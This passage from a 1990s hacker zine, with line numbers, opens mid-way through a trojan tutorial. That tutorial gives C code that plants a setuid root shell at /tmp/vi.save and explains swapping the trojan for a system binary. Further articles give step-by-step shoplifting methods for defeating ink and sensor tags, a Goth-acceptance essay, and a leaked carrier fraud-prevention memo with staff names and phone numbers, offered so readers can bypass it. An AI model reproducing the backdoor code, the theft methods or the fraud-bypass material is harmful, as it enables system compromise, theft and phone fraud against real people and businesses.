  707. that I can think of). One, you can make a shell script (.sh file) and just
  708. get the trojan to run it, using something like:
  709.  
  710. system("sh /home/mydir/myshellscript.sh");
  711.  
  712. In my opinion, using a shell script is about the stupidest thing you can do.
  713. If root finds the trojan, he will most likely know who owns that shell script
  714. (you), and cancel your account. The other would be to just straight out
  715. execute the commands in the code. All you really have to do is add a few
  716. system(); functions and it should work fine. Here's an example trojan (only
  717. the trojan part):
  718.  
  719.   if (getuid() == 0) {
  720.     system("cp /bin/sh /tmp/vi.save");
  721.     system("chown /tmp/vi.save");
  722.     system("chmod 4755 /tmp/vi.save");
  723.     wait(2);
  724.   }
  725.  
  726. That's pretty basic. The wait(2); function is optional. I just add it so
  727. whoever runs it will think the computer is working real hard, since the copy
  728. etc might take a little while on slow systems (btw, this creates a root shell
  729. at /tmp/vi.save - note: this backdoor is common and easy to find, I suggest
  730. not using that).
  731.  
  732.  
  733. Implementing the Trojan
  734. -----------------------
  735. This is the easier part. There is really only one bad thing about trojans.
  736. For most everything you trojan you will most likely need to already have bin
  737. access, or some type of high level access so you can replace the old one. Even
  738. ircII and BitchX are normally stored in the /bin directory if they are system
  739. wide accessible.
  740.  
  741. Of course, compile the new code. After its compiled, just transfer it into the
  742. directory it belongs, and hope a superuser runs it soon. Also, its a good idea
  743. to keep a backup copy of the original binary file so you can replace it once
  744. the trojan is activated. Optional though, of course.
  745.  
  746.  
  747. The End Or Something
  748. --------------------
  749. Uhmm, that's the end or something. Any other questions mail to
  750. k0rtex@hotmail.com ... Hope you might have learned something, probably not
  751. though.
  752. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  753.                        Evading Anti-Shoplifting Devices
  754.                        by Spessa (spessa@phreakers.org)
  755. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  756. In department stores, most expensive clothing items are protected by sensor 
  757. tags. Yet often these aren't really sensors at all, but little containers 
  758. which hold two glass tubes of ink. You can distinguish these tags from actual
  759. sensors by examining the tag closely. Usually, the tag will just say "WARNING!
  760. Any attempt to remove this tag will result in an explosion of glass and ink.
  761. Do not remove!" Well, this warning is a total exaggeration; if you move the
  762. top of the tag in a fashion which puts pressure on the glass tubes, they will
  763. break and ink will flow onto the garment and your hands.
  764.  
  765. Little pieces of glass will NOT fly all over and disfigure you, don't worry.
  766. If the item is of light color, you'll most likely have a permanent stain. So,
  767. don't attempt removal of such in a dressing room! You'll come out with purple
  768. and yellow on your hands, and the dressing room attendant (if there is one) 
  769. will probably call Loss Prevention to follow you around for the rest of your
  770. visit to the store. You may even be detained for destroying store property.
  771. So, what can you do? Since these types of tags aren't going to set off a
  772. signal when you leave the store, conceal the item and do your work at home.
  773. At least in the privacy of your own room no bitchy store employee will freak
  774. out about ink all over your hands.
  775.  
  776. Once home, take off the warning sticker. On some models, once the sticker is
  777. off you can clearly see where the two tubes are and where you're going to need
  778. to saw. Other models require closer inspection between the two pieces which
  779. are joined by a metal pin. Once you've determined how the tubes of glass are
  780. lying, take a small, fine-toothed hacksaw (less than five bucks and worth
  781. every penny) and saw directly down the middle of the tubes. Saw through the metal pin and 
  782. within moments the top and bottom pieces are separated. Put whatever ugly
  783. article of clothing you acquired on and be proud of yourself.
  784.  
  785. But what about when you encounter actual sensor tags? These will not give you
  786. any warning about glass and ink, but will trip an alarm as you exit the store.
  787. Unless you live in an igloo in Antarctica, you've seen these sensors before.
  788. What isn't heavily advertised though, is that older models of sensor tags and
  789. alarms can be easily defeated. Your only problem is determining the age of the
  790. system that your store has installed. If you know the history of the store,
  791. and you remember when they implemented such devices, you can figure out if
  792. this trick is worth your time. Anything older than a year at the time of this
  793. writing (January 1998) is worth looking into.
  794.  
  795. First, to see if this will work at the store of your choice, arm yourself with
  796. some aluminum foil. Just a little should do. Go into the store and remove one
  797. of their tags from an item on the shelf. It wouldn't hurt to take two, just in
  798. case one was deactivated accidentally. Go into a store restroom and LOOSELY
  799. wrap your sensor(s) in the aluminum. Then try exiting the store. This is
  800. sounding risky, but of course you're not going to try this with a new alarm
  801. system, so the risk is highly diminished. If the alarms don't start wailing
  802. and three security guards don't tackle you, go back into the store and see if
  803. you trip the alarm again. If not, you've most likely found sensors which use
  804. a frequency that aluminum disables.
  805.  
  806. If you're female, you can use a purse that has an aluminum lining. No, you
  807. can't buy these; you have to make one yourself. Take the cloth lining out of
  808. your purse and coat the inside of the purse with two layers of aluminum. Then
  809. utilize your mad sewing skills and sew the cloth lining back in. You've got to
  810. be very careful with this purse because it WILL make that "aluminum-crunching"
  811. noise if you hit it up against something. Men can do basically the same thing
  812. in jacket or pants pockets. Or, you can make your own "shop(lift)ing bag" by
  813. making a false bottom (coated with aluminum, also) on a bag from another
  814. store. This works particularly well in malls. The motive to this insanity is
  815. so that you don't have to peel any of those obnoxious stickers off items or
  816. fuck around with something you want to steal before you steal it. Less time
  817. that you have the object in your possession in plain view is less time that
  818. someone can see you with it. Good luck.
  819. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  820.                              Fear of the Unknown
  821.          by NeWarrior (e-mail sysfail@linux.slackware.org to contact)
  822. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  823. Perhaps you see us walking down the street. Most of the time, we'll be on the
  824. other side of the street, though, because you've already crossed to get away
  825. from us. Perhaps you see us sitting in the dark corner of a coffee shop,
  826. reading the newest issue of Sandman, or Poppy Z Brite's latest novel. You sit
  827. and stare at us. Or, perhaps you wander into a club one night, and run into
  828. one of us, wearing a long, flowing black skirt as we cotton-pick our way
  829. across the dance floor to a rythem only we can hear in the music. You whisper
  830. to your friends about us. It happens all the time. You call us names: faggots,
  831. freaks, vampires. But, most of the time, there is one name we are not called.
  832. And that is Goths.
  833.  
  834. Having considered myself a Goth for the past few years, I've ran into all
  835. these experiances on more that one occasion. Fortunately, nothing has come of
  836. it; people yelling at me as I walk down the street, whispers as I walk down
  837. the halls in school, stares as I'm sitting in a McDonalds, but nothing else.
  838. But that's not always the case. I've seen and heard stories of people being
  839. physically abused, humiliated, and outcast solely based on their appearance,
  840. one that does not fit into the realm of the norm. Without a shadow of a doubt,
  841. this is not a good thing.
  842.  
  843. If you don't know what a Goth is, let me give you my idea: we are a (for the
  844. most part) non-political agenda, musically based subculture. We like to dress
  845. in black, have an interest in the darker, more mysterious things in life, and
  846. listen to music like Sisters of Mercy, Bauhaus, Siouxsie and the Banshees, and
  847. others. We are not vampires, although some of us claim to be, but usually they
  848. are not considered Goth. Some of us take a liking to Victorian age dress, dark
  849. peotry, and classic horror writers like Edgar Allen Poe, Bram Stoker, and the
  850. like. We don't think we're the Crow, although some do. Again, usually they are
  851. not considered Goth. Now, this does not mean all Goths subscribe to these
  852. generalizations; I, myself, do not subuscribe to them all. But, most people
  853. that consider themselves Goth have an interest in at least one of the
  854. aformentioned.
  855.  
  856. If you want a full history of Goth, go somewhere else. That's not what this is
  857. about. All this is about is enlightenment. Trying to get people that would
  858. normally scoff at us to accept us. Easily, we are one of the most _feared_
  859. subcultures. Not feared like one would fear being attacked by a rabid dog, but
  860. feared because we are different. It shouldn't be any surprise, though, because
  861. people fear the strange and unusual. Goths are strange and unusual, compared
  862. to the "normal" person. What "normal" person would idolize a characted named
  863. Death? What "normal" person would wear all black when _not_ attending a
  864. funeral? Not many. And this is why we are feared. Simply because we are
  865. different.
  866.  
  867. This is where we need your help. If you see on of us walking down the street,
  868. and you like our make-up, compliment us. If your kid is staring at us, don't
  869. pull him away. If you are ever staring at a flowing black skirt in a mall
  870. while your wife is bying some clothes, try it on. Don't fear us. Live with us.
  871. We may be different, but respect that. There are very few different people in
  872. this world, and most Goths savor the fact that they are among them.
  873. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  874.                 Fraud Force System Technical Interoffice Data
  875.                         by DDay (hempfarm@stomped.com)
  876. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  877. People in the Baton Rouge, New Orleans Louisiana and surrounding towns may
  878. find some use in the following file. It documents the structure of the "Fraud
  879. Force" system being implemented into these locations' cell sites and switches.
  880. It is unknown if it will affect landline systems, but from the way it works,
  881. it is doubtful.
  882.  
  883. EOC---------------------------------------------------------------------EOC
  884. Interoffice Memorandum
  885. Date: Febuary 18,1997                    File: FRAUDFOR
  886. To: Div/Dist Managers                    
  887.     Office Managers                      
  888.     Chris Nolen
  889.     Barry Gugliuzza                      
  890.  
  891. FROM: Phyllis May
  892. SUBJECT: Fraud Force Use In Fraud Markets
  893.  
  894. Laura Graham developed the following procedure for the Customer Service Center
  895. to be used when customers are using the phones in high fraud markets where
  896. Fraud Force has been implemented.
  897.  
  898. The following details are unique to Region 1 and the Force implementation.
  899.  
  900.    Fraud Force will start with the Baton Rouge system the week ending
  901.    Feb 28. Other markets will be added as needed.
  902.  
  903.    All Louisiana, Arkansas, and Texarkana cellulars in this system will be
  904.    routed through Fraud Force.
  905.  
  906.    Calls will be routed to Customer Service.
  907.  
  908. Please direct any questions to Jim Burnham at 318/683-3429 or Rhonda Woodard
  909. at 318/683-3427.
  910.  
  911. (page 2)
  912. Overview:
  913.  
  914. Purpose: FraudForce is a system implemented by Century, to help combat cloning
  915. fraud for our customers roaming in high fraud areas. Affected markets will be
  916. included as needed, those which are found to have high fraud rates.
  917.  
  918. (page 3)
  919. Following is an overview of the verification process for Century customers
  920. using cell service for the first time in a FF market. For detailed
  921. instructions, see "Verification Process."
  922.  
  923. 1. Customer places first call to any number.
  924.  
  925. 2. Call is routed (hotlined) to FraudForce, where an Interactive Voice
  926.    Response (IVR) prompts the user to enter their 10-digit cell number, which
  927.    is verified ending with the pound key. The customer has three (3) tries to
  928.    enter their number correctly.
  929.  
  930. 3. Call is transferred to Century Cellunet's customer service center.
  931.       - Valid customers will continue to step 4
  932.       - Invalid customers are instructed to make another call and
  933.         re-enter the correct cell number.
  934.  
  935. 4. The customer information is verified to confirm the cell user is valid.
  936. -----------------------------------------------------------------------
  937. |If Information Is         |     The CSR                              |
  938. -----------------------------------------------------------------------
  939. |  verified,               | explains the call credit and             |
  940. |                          | procedure to establish PIN. Go to step 5 |
  941. |-------------------------- -------------------------------------------
  942. |  not verified,           | presses 0 on their keypad to transfer to |
  943. |                          | a recording explaining the caller is     |
  944. |                          | denied.                                  |
  945. |__________________________|__________________________________________|
  946.  
  947. 5. The CSR presses 1 to transfer the call to the FraudForce IVR,and the
  948.    customer interactively uses their phone keypad to establish a 4 digit PIN.
  949.  
  950. 6. If a billed call, the CSR notes the length of the call and credits the
  951.    customer's account (length of call X roaming airtime rate) to AFDFC. This
  952.    is because the customer incurred airtime charges during verification and
  953.    PIN selection.
  954.  
  955.  
  956. ESTABLISHING AND USING A PIN
  957.  
  958. Hours accessible: Any normal working hours. Customers after hours will be
  959.                   directed to call during normal hours.
  960. Call types:       There are two types of FraudForce calls.
  961.  
  962. Fraud Force 1     These are calls where the customer entered a valid 10
  963. -------------     digit cell number when prompted after the initial hotline.
  964.                   There are customers who had previously established a PIN,
  965.                   however entered it incorrectly and must repeat the
  966.                   verification process, or are making their first call in the
  967.                   FraudForce market verifying for the first time.
  968.  
  969. Fraud Force 3     These are calls where the customer entered an invalid 10
  970. -------------     digit cell number or pressed zero (0) for assistance (the
  971.                   customer has three tries to enter their cell # correctly).
  972.  
  973.                   The customer can not be verified without entering a valid
  974.                   10 digit number. They are instructed to attempt the call
  975.                   again,so they receive the IVR prompts to enter the 10
  976.                   digit number correctly.
  977.  
  978. PIN DETAILS:      The PIN is four digits and should not start with zero.
  979.                 
  980.                   The PIN is not accesible to Century. The customer must
  981.                   remember their PIN.
  982.  
  983.                   Once established, the PIN is valid in that market until
  984.                   Century removes it and the customer calls the IVR to
  985.                   establish a new one. This can be done if the user forgets
  986.                   their PIN or if the usage/user appears to be fraudulent and
  987.                   Century needs to block service.
  988.  
  989.                   A PIN must be established in each FraudForce market. The
  990.                   same PIN may be used in every FraudForce market, or
  991.                   different PINs may be used.
  992.  
  993.                   Different customers MAY have the same PIN.
  994.  
  995.                   The customer will periodically be asked to enter the PIN
  996.                   before making a call.
  997.  
  998.                   A user has 3 tries to enter the PIN correctly. On the 4th
  999.                   try,the call will be directed to Fraud Force 1.
  1000.  
  1001. (page 4)
  1002. VERIFICATION PROCEDURES
  1003. The following are the procedures for a FraudForce 1 call.
  1004.  
  1005. 1. Customer first places call to any number.
  1006.  
  1007. 2. Caller is hotlined to FraudForce,where an IVR prompts the user to enter
  1008.    their 10 digit cell phone number and the pound key.
  1009.  
  1010. 3. When entered correctly, the call is transferred to Century's customer
  1011.    service center, with the following introduction: "Please verify your 10
  1012.    digit cellular number. Press any key to accept this call."
  1013.  
  1014. 4. The CSR presses any key on their phone to accept the call and says to the
  1015.    caller "Century Cellunet, this is (name). You are currently roaming in a
  1016.    high cellular fraud area. For your protection and ours,will you verify some
  1017.    account information to enable you to establish a Personal Identification
  1018.    Number,or PIN."
  1019.  
  1020. 5. Important: customer information must be verified to confirm that the
  1021.    account holder, secondary authorization holders, or business account
  1022.    cellular users are valid before given access to establishing a PIN.
  1023.  
  1024.   Individal Accounts:
  1025.   What city are you currently in?
  1026.   What is your mobile number?
  1027.   What is your name?
  1028.   If user differs from account name, what is the name on the account?
  1029.   What is your Social Security Number?
  1030.  
  1031.   If the Social Security number is not verified, verify one of the following:
  1032.   What is the account's billing address?
  1033.   What is your home phone number?
  1034.   What is your work number?
  1035.  
  1036.   Business Accounts:
  1037.   What city are you currently in?
  1038.   What is your mobile number?
  1039.   What is your name?
  1040.   What is the account name?
  1041.   What is the account's billing address?
  1042.  
  1043. The general billing address is okay, if not verified at all (customer does not
  1044. know), verify the following:
  1045.   What is your work phone number?
  1046.  
  1047. (page 5)
  1048. If information is verified:
  1049.   Thank you for your cooperation.
  1050.   If a billed call: You will receive credit for this call.
  1051.   If a free call: This is a free call.
  1052.   I am now returning you to the system so you can set up your PIN.
  1053.  
  1054. The CSR presses 1 on their keypad to transfer to the FraudForce IVR to
  1055. establish their PIN.
  1056.  
  1057. If Information is NOT verified:
  1058.   "I am unable to authorize the information you have given," and presses 0
  1059.   on their keypad to transfer the call to a recording explaining the call
  1060.   is denied (no don't give out account information).
  1061.  
  1062. 7. The CSR tickles the customer's account using an action code of PENDF.
  1063.    Include the 1- digit cellular number, FF, whether or not the customer
  1064.    was verified.
  1065.  
  1066. (page 6)(End of Memo)
  1067.  
  1068. I would have typed the rest of this file, but it's basically just a list of
  1069. customers' questions and alternate places for the caller to be transferred.
  1070. Nothing you pretty much need to know about the system, but if you keep a copy
  1071. of this on hand, you may be able to bypass. You have what the operator is
  1072. looking at, you know what she's going to do. Use this information, don't
  1073. flaunt it. Century is a good corporation, but sometimes you need a cell! If
  1074. updates to this file are made, I will be sure to send them out to the public.
  1075.  
  1076.  
  1077. UPDATE: I have just discovered that FraudForce is now being implemented in
  1078. almost all cities around the country that use Century. Now this is a serious
  1079. problem.
  1080. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1081. Well, that's the end of issue 8. I hope you all like the site redesign, and
  1082. I'll be back in a month or so with System Failure #9. E-mail us your comments
  1083. and submissions at sysfail@linux.slackware.org. Werd out!@
  1084. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-E-O-F-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1085.